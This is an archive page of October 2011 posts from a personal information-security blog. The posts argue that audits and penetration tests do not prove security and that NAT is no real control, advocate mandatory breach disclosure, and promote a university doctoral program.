Saturday, 8 October 2011

Security News and Views weekly podcast

The Security News and Views weekly podcast is up and ready http://craigswright.podbean.com/2011/10/08/security-news-and-viewsfor your weekly security news updates. Some of the things I have found of interest in the week in an MP3 and PDF format.

http://craigswright.podbean.com/2011/10/08/security-news-and-views/

We test insecurity but do not measure security

Right now, we test insecurity and believe that this makes us secure.

Even the methods are wrong. One of the fundamentals of science is that we cannot prove a negative. Some argue this, but they fail to understand the concept of proof. What we do is provide evidence to support a hypothesis. Basically, we select a likely postulate based on what the evidence at hand seems to tell us.

Now, what we cannot do is assert we have seen all failures, thus that no failures exist. More, we cannot assert we have seen all the vulnerabilities we can ever expect.

He who knows only his own side of the case, knows little of that. His reasons may be good, and no one may have been able to refute them. But if he is equally unable to refute the reasons on the opposite side; if he does not so much as know what they are, he has no ground for preferring either opinion. [1]

This is cogent when we consider how we look at security testing. Do not get me wrong, penetration testing has a place. When conducted by a skilled (and it is by far an art and not a science) tester, penetration testing can have positive effects. It can be used to display the holes we have in a system and to have management and others take an issue seriously.

What an ethical attack or penetration test can not do is tell us we are secure.

The best we can hope for is that we have:

  • A skilled tester on a good day [3],
  • That we were fortunately enough to have the test find the main vulnerabilities within scope and time constraints [2],
  • That we happen to be lucky enough to actually find the flaws [4], and
  • That the flaw was open at the time of testing.
These of course are only the tip of the iceberg, but basically, what a penetration test tell us is that we have no glaringly open holes within the scope of the report (we hope).

That does not mean we are secure.

In an upcoming paper [5] to be presented at the 2011 International Conference on Business Intelligence and Financial Engineering in Hong Kong in December, we report the results of common system audits.

Not that I see this as winning myself any popularity with auditors and testers (and nor do I think I will be forking for an audit firm following the release of the paper ever again), but we show that many systems that are said to be secure as a result of passing a compliance check are not actually secure.

Basically, there are few incentives other than reputation to account for the actions of a tester and many with inadequate skills fill the field. The reason we believe is that there is little downside. It is easy even as a poorly skilled tester to maintain a business and gain work in this field.

It is an all too common state of affairs to see the software vendors blamed for the lack of security in systems, but it is rare to see the auditors and testers call to account. We propose the notion of negligence and tort-based responsibility against the inattentive auditor. This would have the auditor liable for the errors and failures with a comparative liability scheme proposed to enforce this such that the failure to implement controls in a timely manner or to hide information from the auditor would mitigate the auditor’s liability. 

This would require a radical rethinking of the ways that we currently implement and monitor information security and risk. In place of testing common checklist items such as password change policy and determining the existence of controls[1], a regime of validating the effectiveness and calculating the survivability of the system is proposed.

What we tested
In a review of 1,878 audit and risk reports conducted on Australian firms by the top 8 international audit and accounting firms, 29.8% of tests evaluated the effectiveness of the control process. Of these 560 reports, 78% of the controls tested where confirmed through the assurance of the organization under audit. The systems where validated to any level in only 6.5% of reports. Of these, the process rarely tested for effectiveness, but instead tested that the controls met the documented process. Audit practice in US and UK based audit firms does not differ significantly.

Installation guidelines provided by the Centre for Internet Security (CISecurity)[1] openly provide system benchmarks and scoring tools that contain the “consensus minimum due care security configuration recommendations” for the most widely deployed operating systems and applications in use. The baseline templates will not themselves stop a determined attacker, but can to demonstrate minimum due care and diligence. Only 32 of 542 organizations analysed in this paper deploy this form of implementation standards.
clip_image002
Figure. Patching, just enough to be compliant, too little to be secure.

The patch levels of many systems are displayed in the figure above. The complete data will be released in the paper [5].

What we do see however is that many systems are not maintained. Core systems including DNS, DHCP, Routers and Switches are often overlooked. In particular, core switches were found to be rarely maintained in any but a few organisations and even in Penetrations tests these are commonly overlooked (and it was truly rare to see these checked in an audit).

As Aristotle (350 B.C.E) noted:
The same is true of crimes so great and terrible that no man living could be suspected of them: here too no precautions are taken. For all men guard against ordinary offences, just as they guard against ordinary diseases; but no one takes precautions against a disease that nobody has ever had.”

Incomplete information is not to be confused with imperfect information in which players do not perfectly observe the actions of other players. The purpose of audit is to minimize the probability of incomplete information being used by management. For this to occur, information needs to be grounded in fact and not a function of simplicity and what other parties do.

Most security compromises are a result of inadequate or poorly applied controls. They are rarely the “disease that nobody has ever had.”
 
Businesses need to demand more thorough audits and results that are more than simply meeting a compliance checklist. These must include not only patching for all levels of software (both system and applications) as well as the hardware these run on. This failure of audits to "think outside the box" and only act as a watchdog could ultimately be perceived as negligence for all parties.

[1] Such control checks as anti-virus software licenses being up to date and a firewall being installed are common checklist items on most audits. Validating that the anti-virus software is functional or that the firewall policy is effective are rarely conducted.
[2] CIS benchmark and scoring tools are available from http://www.cisecurity.org/

References:
[1] John Stuart Mill, On Liberty
[2] Wright, C. (2006) “Ethical Attacks miss the point!” System Control Journal ISACA
[3] Wright, C. “Where Vulnerability Testing fails” System Control Journal ISACA (extended SANS RR paper linked)
[4] Wright,  C. (2005) “Beyond Vulnerability Scans — Security Considerations for Auditors”, ITAudit, Vol 8. 15 Sept 2005, The IIA, USA
[5] Wright, C. “Who pays for a security violation? An assessment into the cost of lax security, negligence and risk, a glance into the looking glass.”

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.

Friday, 7 October 2011

Flexibility the key of Doctorate

The following is a press release for the DIT program at CSU. We plan to have over 100 new doctoral students in the next year with a focus on digital forensics and information security research. This will be applied research.

For those who do not think they can do a doctorate, this program has been structured in steps:

  1. Post Grad Certificate
  2. Master, Research
  3. Doctor of Information Technology
The program is industry focused. We plan to build the research skills that are needed in industry and government, the skills needed for a new form of education.

Soon after this, I will be announcing a  formal plan for open community sourced information systems security and digital forensics training and education. We are constructing a community based education resource. This will consist of:
  1. Training papers
  2. Audio lectures
  3. Video guides
The aim will be to openly train over 20,000 security professionals by 2020. This will be 20,000 people with a high level of skills. This will of course require far more people to be trained.

Our goal is to have a resource available to the world that will allow a novice security professional to follow step by step guidelines in securing and responding to their organization's systems. For instance, we would like to see a junior incident responder able to use a tablet, follow a series of commands and step through a video on how to image a drive on a potentially compromised system.

More information will be coming in the weeks ahead.

The release:
Already the market leader in domestic IT postgraduate course enrollments, Charles Sturt University (CSU) plans to be the leading IT research university by 2017.

As part of this strategy, CSU have launched a revised Doctor of Information Technology today, offering a unique Doctorate that is industry relevant, flexible and industry based.

The Doctorate Market has experienced strong growth with over 43 000 students undertaking Doctorates at Australian Universities in 2008 and this continues to increase as the industry grows.

“Charles Sturt University has gathered feedback from potential students, graduates and industry leaders to discover what’s needed in a Doctorate of IT,” CSU School of Computing and Mathematics adjunct lecturer Mr Martin Hale said. “We discovered there were three main barriers for people who were thinking of taking on this level of study and they were the size of the commitment, the perception that technically qualified supervisors would not be available and the belief that there was a lack of employer support. These three barriers have been addressed within the development of this restructured course.”

The restructured course will give students the option of exiting with a Graduate Certificate or Masters and strong supporter of the Doctorate course, Mr John Ridge AM, Executive Officer at the Australian Computer Society (ACS) believes this will take the risk out of committing to a full Doctorate in a set time period.

“People can exit at different points and they exit with a qualification.  This provides the opportunity to obtain those points and then, if you need to exit you can, with qualifications. You can take a break for a while and then pick it up again. It’s great to have this flexibility without losing the time you’ve put into it.”

IT Masters has identified a pool of potential Adjunct Industry supervisors who have undertaken the CSU supervisory training program before being allocated a student. One of these supervisors is Charles Sturt University (CSU) adjunct lecturer, Asia Pacific Director of the Global Institute for Cybersecurity + Research and leading Australian cyber security expert, Dr Craig Wright.

“The reason professionals undertake a doctorate is to differentiate themselves in a growing workforce and this restructure offers one of the most flexible and work-relevant courses available.

“My background is in information security and forensics, which is a growing area within the industry, and software security and digital forensics are areas the doctorate will address. Students can be assured that supervisors have the technical expertise in highly specialised areas like this and can therefore help them with their studies.”

In the research conducted, most prospective students indicated that they would be approaching their employers to help fund their studies but doubted they would get support as the only output was a Thesis that would not be available for at least six years.
 “Rather than pure academic papers, the restructure has included White Papers, or applied papers giving  employers tangible outcomes within an acceptable timeframe that makes a difference now,”  Mr Hale said.

“The relationship Charles Sturt University has with the IT industry is something that other universities do not have,” Mr Ridge said. “This industry flexibility and industry focus is a good thing. There is a wave of change in some academic circles where this Doctorate is going.”

People are looking for a doctorate that offers more applied research rather than pure research and this one delivers. I’m a big fan of Charles Sturt University’s IT Masters for same reason – there are industry relevant qualifications and embedded in the qualification is industry certification. The Doctorate is continuing the same sort of trend but taking it to new level.”

Tuesday, 4 October 2011

More Netstat


Did you know that you could turn netstat into a simple port monitor and reporter?

In this session we discuss all the things you likely did not know that netstat for windows could do.Such as monitoring web sessions with:
netstat -nao 5 | find ":80 "

NAT is secure, think again

Again and again I here how NAT is secure. Just the other day, in response to a post I made, it was argued that:
NATs are quite simple: an external point of access forwards data to an internal computer. This forwarding is governed by existing connections, rules set up based on protocol information or forwarded to a default host that takes care of manipulating and forwarding data to an inaccessible internal computer.

Again, to paraphrase Clausewitz, everything in security is very simple. But the simplest thing is difficult.
I have written on this topic in the past. What seems to be missed is that it is actually simple to setup connections through a NAT based device. This is known as shovelling a shell. Basically, NAT (or network address translation) is not a security mechanism, we just use it as such.

Right now, NAT provides some benefits from scanning worms and randomised attacks. The thing is, this is not how systems are being compromised any more. NAT does not stop Browser based attacks, malware, PDF exploits, flash based rebinding attacks… I could go on.

Home systems are one thing, NAT is still not going to do a great deal in the long run, but it is better than nothing. Just

However, SCADA systems are not adequately secured using NAT.

These are critical systems that are targeted and at high risk, at times the destruction of such a system can result in kinetic effects. You do not require a Stuxnet worm to break a system, only for fine control. Many groups simply desire anarchy and chaos and this the destruction of a system will suffice.
We cannot continue to call systems firewalled simply as they have a NAT device between them and the Internet.

What can we do?
For a start, limit outgoing access. Add extrusion filters and stop open access. You do not NEED the entire Internet.

Basically, you should do the following at a minimum (this is not a home user solution other than for the technically insane such as myself):

  • Limit all access to only selected ports.
  • Use DNS forwarders. Split-Split DNS is recommended for many reason. One is that it also stops many forms of exfiltration of data over these ports (though even then still not all).
  • Use a Web Proxy. This can be a simple forwarder with nothing but logging, but the addition of a simple forwarder will stop some exfiltration over the web (although SSL remains an issue for this).
  • Block all outgoing SMTP email sessions (other than to allowed servers). Why make it easy for the spammers?
  • Force client hosts to connect to servers and add control points.
Use a risk based approach to security. If you run a system that can result in high value losses or worse, the loss of life, then we need to ensure that we do more than simple NAT filtering.

IPv6 is a game changer
Soon (and some places have already moved to IPv6), we are going to no longer even have the rudimentary obscurity that NAT provided. IPv6 does not work with firewalls well as much as well try and fool ourselves into the misguided belief that it does and that we can maintain the crunchy shell approach we have loved to rely on for the past could decades.

Tunnelling at times already means that many organisations are connected to the IPv6 Internet through protocols such as Teredo without even knowing it. NAT does not actually do anything to stop this and many hosts are simply connected to the IPv6 internet already. The fortune is that we cannot expect to scan hosts randomly in the IPv6 world and again the protection is obscurity and not a real control.
If you run Windows 7 and you allow outgoing UDP, you are likely already connected to the IPv6 internet without any firewalling. This includes hosts hiding behind NAT. Tunnels remove NAT based controls.

The thing is, with IPv6, everything starts to be a part of the cloud!
Using routed IP addresses, tunnels and mobile IP means that we are all located internal, external and everywhere all of the time. The cloud is not something out there, it will be something INSIDE your network soon (if it is not already with tunnels).

Disease models…
There is a reason we call malicious code after disease terms, worms, virii, etc. They mirror many of the effects.

What we need to start to do when thinking about both cloud and IPv6 models is the creation of isolation and quarantine points.  Peer systems should not have to talk to peer systems and can be controlled at organisational choke points. In the coming weeks I will be providing a session to government. This will be recorded and in time made available freely online. I will post as this occurs.

In a disease control scenario, we set quarantine breakpoints and controls. We do not allow all systems to talk to all systems. With multicast groups and the Security Association Database in IPSec, we can actually do this in a manner that makes each system its own firewalled domain. Right now, this seems difficult to most people, but it does not need to be. So, keep reading and I will start to add processes in the coming weeks on how to achieve this within an organisation.

I will be talking more of this approach in the coming weeks.

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.

Monday, 3 October 2011

A goodbye to one in our field

Dr. Gene Schultz, Security Leader, Author and devoted teacher has passed away today after a stroke.

He was a great man and one of the leaders in our field. I would like to take the time to say he will be missed.

Doctor of Information Technology (DIT) Course

CSU have re-designed the Doctor of Information Technology (DIT) Course in collaboration with IT Masters Pty Ltd. The new version of the DIT will better serve the IT industry and research training needs. The new course targets various market segments; from those who wish to enhance their skills in developing white papers for the IT industry, to those who plan to examine current practical research issues that the IT industry is facing.

We have a focus on applied security and digital forensic research at the doctoral level.

The launch of the new DIT course at the Australian Computer Society (ACS) Foundation office in Sydney (Level 11, 50 Carrington Street) on Friday, 7 October 2011 commencing at 5.30 pm. I will provide details of all this soon.

On disclosure

In my twenty plus years in information security I have seen many things. I started as many in the security world begin, with the view that we need to maintain secrecy. That obscurity has some (even if a minor) effect. However, in the course of years and in completing over 1,000 reviews and audits in those decades, I have documented and watched the effects of darkness on security.

The results have changed my views from one of covering the truth in order to minimise damage to that of the sunshine principle. Only when we bring exploits into the light of day do we hope to counter them. This is not simply from a perspective of personal opinion, but through the one science that can help us measure these effects, economics. Everything has a cost and only through treating security as a relative and not an absolute can we hope to effectively protect our systems and through them, society.

In writing on SCADA issues, I have been told that I will not ever see another audit of such a system. That is clearly false as some of my best supporters in this are people who are clients. There are those who will not hire me for saying that I want things open, and these are also the types of people I would not ever want to deal with again. There is a reason for this, those who run SCADA systems responsibly suffer greater costs and are less efficient in the short term than those who manage their systems well. The difference comes in the long term, but this in itself can be problematic.

In my years testing systems and responding to incidents, I have seen more failures than I care to remember. Some have been spectacularly complex, others have been dismal and it amazed me as to how poorly the controls could be set.

Right now, we do not have top report system breaches in most places. The result of this is that for every public breach (and here there are many), we see but the tip of the iceberg. From my experience, and this is simply anecdotal, I would estimate 100 or more breaches occur for each one that becomes publically known.

It has been demonstrated that security disclosure has a negative impact on a company’s share price. This depends strongly on the nature of the organisation. Some organisations actually have no economic impact from a breach. For others, the effect is catastrophic.

Toys [1], vendors and the existing compliance regime have to take some of the blame for the failures we see. I worked with one critical system using SCADA equipment that managed to pass audits for five years running. An independent analysis of the system concluded that if this system failed, upwards of 30,000 lives could be lost as an expected risk value. The system was at one stage infected with a scanning worm and Trojan. We contained the worm, but the system was never rebuilt.

The answer was to implement firewalls and monitoring controls that stopped the Trojan from connecting to a C&C server.

We talk of the difficulty in creating a Stuxnet type code sample, but we forget that the aims of Stuxnet involved fine control. The creators wanted a specific outcome. This is difficult to achieve. Chaos on the other hand is simple. Maintaining systems is difficult and requires more knowledge and sophistication than most groups have. Crashing critical monitoring systems on the other hand, well that is easy.

I like aircraft systems for the most part, even these have issues from time to time, but the people I worked with in the past always took matters seriously. I note these as they are the better run systems and when we see the best system have issues, then we can put into the light those systems who do far less to ensure they remain secure.

Even the best run and maintained systems suffer from problems. In Gatelink and engine management, Boeing once had only WEP implemented over the 802.11B connections. This has now improved and EAP-TLS with AES using mutually authenticated endpoints is the norm, but it was only testing and discovery that actually made this change occur.

More, it was necessary to actually demonstrate that line of sight connectivity using a focused antenna could be made from a fishing boat 2Km away and still send and transmit data. The initial belief was that directionally focused antenna would restrict the range that wireless signals could be intercepted. Yes, this is only available on the ground and specialist knowledge of the systems is necessary. That is also a problem, even in controlled systems; we see the design and scheme leaked onto the Internet and on P2P networks.

Security through obscurity is simply false security and leaves us vulnerable with no way to measure the true risk.

So, I have become a proponent of mandatory disclosure.

The reporting of news and events is in itself a problem. We rarely report on the wins and just sensationalise the losses. Instead of commending companies for what they do right, we look at failures and do nothing but knee jerk reactions and fire fighting.

We are about to enter a world where everything is online. My DVD player is online and I have ordered internet connected wireless light globes for testing. With IPv6 finally just around the corner, we will see many of the controls we have relied on fail us. NAT (network address translation) and firewalls fail under the distributed architecture model of IPv6. These have offered some control and protection for a while, but that time has long past.

With a little knowledge, one can do a Google search on a SCADA or PLC and find multiple examples of systems that are supposed to be air-gapped and never connected to the world online and vulnerable to attack. We have to start treating the risks associated with these systems seriously and stop putting our heads in the sand. We are already seeing attacks against SCADA systems. Why are these not all being taken down now and causing loss and damage? Well one aspect is that they are being Trojanised and remotely controlled. Not for an effect now, but in case.

Carl von Clausewitz wrote how “the backbone of surprise is fusing speed with secrecy.” We provide that secrecy when we allow compromised systems to remain online, when we hide the fact that our critical systems have been compromised. He further reminded us that “War is not an independent phenomenon, but the continuation of politics by different means.”

We are seeing the Chinese and North Koreans compromise more and more critical systems each week. Some of these are in the press, but these are either the failures or the systems that are already mined for all they are worth. For the most part, these breaches remain secret and out of public purview. To the North Koreans, the entire purpose of a computer network seems to be as a platform for politics through any means.

To paraphrase Clausewitz, everything in security is very simple. But the simplest thing is difficult.

Judge Learned Hand formulated a legal rule. He said that everything had to be measured in terms of ensuring that “B<PL”. That is, the burden of untaken precautions (B) has to be less than the product of the probability of an outcome (p) by the severity of outcome (L).

This is more than simply looking at the short term costs and effects, but the probability of more dire events and consequences as well. To allow Judge Hand’s rule, we cannot hide in the dark, we need to expose the disease that comprises many of our security controls to the antiseptic of sunlight.

Now, my focus is on teaching. I still do some work and consulting, but only as I do not believe a teacher who is teaching security can do so without exposure to the “real world”. If I do not work on sites that want to have an audit such that they can fulfil a compliance obligation and not actually take the risks seriously, I could not be happier.

Frankly, it is about time we actually started to expose risks and then allow society to place a value on these risks.

[1] I define “Toys” as security product for the sake of product. A prime example is IDS without monitoring and/or tuning.

Sunday, 2 October 2011

Thought for the night

Carl von Clausewitz wrote how “the backbone of surprise is fusing speed with secrecy.” We provide that secrecy when we allow compromised systems to remain online, when we hide the fact that our critical systems have been compromised. He further reminded us that “War is not an independent phenomenon, but the continuation of politics by different means.”

We are seeing the Chinese and North Koreans compromise more and more critical systems each week. Some of these are in the press, but these are either the failures or the systems that are already mined for all they are worth. For the most part, these breaches remain secret and out of public purview. To the North Koreans, the entire purpose of a computer network seems to be as a platform for politics through any means.

To paraphrase Clausewitz, everything in security is very simple. But the simplest thing is difficult.

Security News and Views

The security podcast and PDF for this week is up. Late by a day, but there.

http://craigswright.podbean.com/2011/10/01/security-news-and-views/